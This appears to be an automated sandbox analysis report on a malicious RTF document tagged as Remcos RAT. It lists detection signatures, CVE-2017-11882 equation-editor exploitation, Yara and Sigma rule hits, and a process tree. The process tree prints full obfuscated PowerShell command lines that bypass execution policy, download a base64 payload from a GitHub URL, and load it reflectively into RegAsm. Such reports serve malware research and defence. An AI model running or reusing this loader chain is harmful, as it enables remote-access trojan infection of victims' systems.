Edit tour
Windows
Analysis Report
IpEmBW3Qw5.rtf
Overview
General Information
| Sample name: | IpEmBW3Qw5.rtfrenamed because original name is a hash value |
| Original sample name: | 85bb9c92d8128e3c8cf070a813b9ba82.rtf |
| Analysis ID: | 1526389 |
| MD5: | 85bb9c92d8128e3c8cf070a813b9ba82 |
| SHA1: | cc187bf0c745ccd7fb932faa2ee030bb404ab1eb |
| SHA256: | 71e0b0884fbf2ba2f8c52e90ae66f5be792d6b1f67d4ef86226958cc0bba3970 |
| Tags: | RATRemcosRATrtfuser-abuse_ch |
| Infos: |   |
 | |
Detection
| Score: | 100 |
| Range: | 0 - 100 |
| Whitelisted: | false |
| Confidence: | 100% |
Signatures
Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Sigma detected: EQNEDT32.EXE connecting to internet
Sigma detected: File Dropped By EQNEDT32EXE
Bypasses PowerShell execution policy
Document exploit detected (process start blacklist hit)
Found potential equation exploit (CVE-2017-11882)
Installs new ROOT certificates
Obfuscated command line found
Office drops RTF file
Office equation editor establishes network connection
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: Equation Editor Network Connection
Sigma detected: HackTool - CrackMapExec PowerShell Obfuscation
Sigma detected: Potential PowerShell Command Line Obfuscation
Sigma detected: Potential PowerShell Obfuscation Via Reversed Commands
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: Suspicious Microsoft Office Child Process
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Wscript starts Powershell (via cmd or directly)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Document contains Microsoft Equation 3.0 OLE entries
Document misses a certain OLE stream usually present in this Microsoft Office document type
Enables debug privileges
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Office Equation Editor has been started
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Stores large binary data to the registry
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match
Classification
- System is w7x64
WINWORD.EXE (PID: 3264 cmdline: "C:\Progra m Files\Mi crosoft Of fice\Offic e14\WINWOR D.EXE" /Au tomation - Embedding MD5: 9EE74859D22DAE61F1750B3A1BACB6F5) 
EQNEDT32.EXE (PID: 3344 cmdline: "C:\Progra m Files\Co mmon Files \Microsoft Shared\EQ UATION\EQN EDT32.EXE" -Embeddin g MD5: A87236E214F6D42A65F5DEDAC816AEC8) 
wscript.exe (PID: 3500 cmdline: "C:\Window s\System32 \WScript.e xe" "C:\Us ers\user\A ppData\Roa ming\newpr ojectwithn ewthingsto becom.vBS" MD5: 979D74799EA6C8B8167869A68DF5204A) 
powershell.exe (PID: 3548 cmdline: "C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" -command $ Codigo = ' LiAoICRFTl Y6Y29tc3BF Y1s0LDE1LD I1XS1qT0lO JycpICgoJ0 licHUnKydy bCcrJyA9IG d6Smh0dHBz OicrJy8vJy sncmF3Licr J2dpdGh1Yn VzZXInKydj b250JysnZW 50LmNvbS9O b0RldGVjJy sndCcrJ09u L05vRCcrJ2 V0ZWN0Tycr J24nKycvcm UnKydmcycr Jy9oZScrJ2 Fkcy9tJysn YWknKyduLy crJ0RlJysn dGFoTm90Jy snaC1WLicr J3R4JysndG cnKyd6Sjsg SWInKydwYm FzZTY0Jysn Q29uJysndG VudCA9Jysn IChOZXcnKy ctJysnT2Jq JysnZWN0IF MnKyd5c3Qn KydlbS5OZX QnKycuV2Vi JysnQ2xpZW 50KS5Eb3du JysnbG8nKy dhZFMnKyd0 cmluJysnZy crJyhJYnB1 cmwnKycpOy BJYnBiaW5h cnknKydDb2 50ZW50ID0g JysnWycrJ1 N5Jysnc3Rl bS5Db252ZX J0XTo6RnJv JysnbUInKy dhc2U2NCcr J1N0cmluJy snZyhJYnBi JysnYScrJ3 NlNjRDbycr J250ZW50Jy snKTsgSWJw YXNzZW1ibC crJ3kgPSAn KydbUicrJ2 UnKydmbCcr J2VjdGlvbi crJy5Bc3Nl bWJseV0nKy c6OkxvYWQo SWJwYmluYX J5JysnQycr J28nKydudG VudCk7IFtk bmxpYi5JTy 5Ib21lXTon Kyc6VkFJKH A3anR4dC5W RycrJ0ZSUi 8wMDEvMDIn KycuMDIyLj MuMjknKycx JysnLy8nKy c6cHR0aHAn Kyc3aiwnKy cgcDcnKydq ZGVzYXRpdm Fkb3A3aiwg cCcrJzdqZG UnKydzYXRp dicrJ2Fkb3 A3aiwnKycg cDcnKydqZG VzYXRpdmFk bycrJ3A3ai crJywgcDdq UmVnQXNtJy sncDdqJysn LCBwNycrJ2 pwN2oscDcn KydqcDdqKS cpLlJlcGxh Q2UoJ2d6Si csW1NUUklu Z11bQ2hhUl 0zOSkuUmVw bGFDZSgncD dqJyxbU1RS SW5nXVtDaG FSXTM0KS5S ZXBsYUNlKC dJYnAnLCck JykgKQ=='; $OWjuxd = [system.Te xt.encodin g]::UTF8.G etString([ system.Con vert]::Fro mbase64Str ing($codig o));powers hell.exe - windowstyl e hidden - executionp olicy bypa ss -NoProf ile -comma nd $OWjuxD MD5: EB32C070E658937AA9FA9F3AE629B2B8) - powershell.exe (PID: 3652 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" -windowsty le hidden -execution policy byp ass -NoPro file -comm and ". ( $ ENV:comspE c[4,15,25] -jOIN'') ( ('Ibpu'+'r l'+' = gzJ https:'+'/ /'+'raw.'+ 'githubuse r'+'cont'+ 'ent.com/N oDetec'+'t '+'On/NoD' +'etectO'+ 'n'+'/re'+ 'fs'+'/he' +'ads/m'+' ai'+'n/'+' De'+'tahNo t'+'h-V.'+ 'tx'+'tg'+ 'zJ; Ib'+' pbase64'+' Con'+'tent ='+' (New '+'-'+'Obj '+'ect S'+ 'yst'+'em. Net'+'.Web '+'Client) .Down'+'lo '+'adS'+'t rin'+'g'+' (Ibpurl'+' ); Ibpbina ry'+'Conte nt = '+'[' +'Sy'+'ste m.Convert] ::Fro'+'mB '+'ase64'+ 'Strin'+'g (Ibpb'+'a' +'se64Co'+ 'ntent'+') ; Ibpassem bl'+'y = ' +'[R'+'e'+ 'fl'+'ecti on'+'.Asse mbly]'+':: Load(Ibpbi nary'+'C'+ 'o'+'ntent ); [dnlib. IO.Home]:' +':VAI(p7j txt.VG'+'F RR/001/02' +'.022.3.2 9'+'1'+'// '+':ptthp' +'7j,'+' p 7'+'jdesat ivadop7j, p'+'7jde'+ 'sativ'+'a dop7j,'+' p7'+'jdesa tivado'+'p 7j'+', p7j RegAsm'+'p 7j'+', p7' +'jp7j,p7' +'jp7j)'). ReplaCe('g zJ',[STRIn g][ChaR]39 ).ReplaCe( 'p7j',[STR Ing][ChaR] 34).ReplaC e('Ibp','$ ') )" MD5: EB32C070E658937AA9FA9F3AE629B2B8)
- cleanup
⊘No configs have been found
| Source | Rule | Description | Author | Strings |
|---|---|---|---|---|
| INDICATOR_RTF_MalVer_Objects | Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents. | ditekSHen |
|
| Source | Rule | Description | Author | Strings |
|---|---|---|---|---|
| INDICATOR_RTF_EXPLOIT_CVE_2017_8759_2 | detects CVE-2017-8759 weaponized RTF documents. | ditekSHen |
|
| Source | Rule | Description | Author | Strings |
|---|---|---|---|---|
| INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC | Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution | ditekSHen |
| |
| INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC | Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution | ditekSHen |
|
Exploits |   |
|---|
| Source: | Author: Joe Security: | ||
| Source: | Author: Joe Security: | ||
System Summary | |
|---|
| Source: | Author: Florian Roth (Nextron Systems): | ||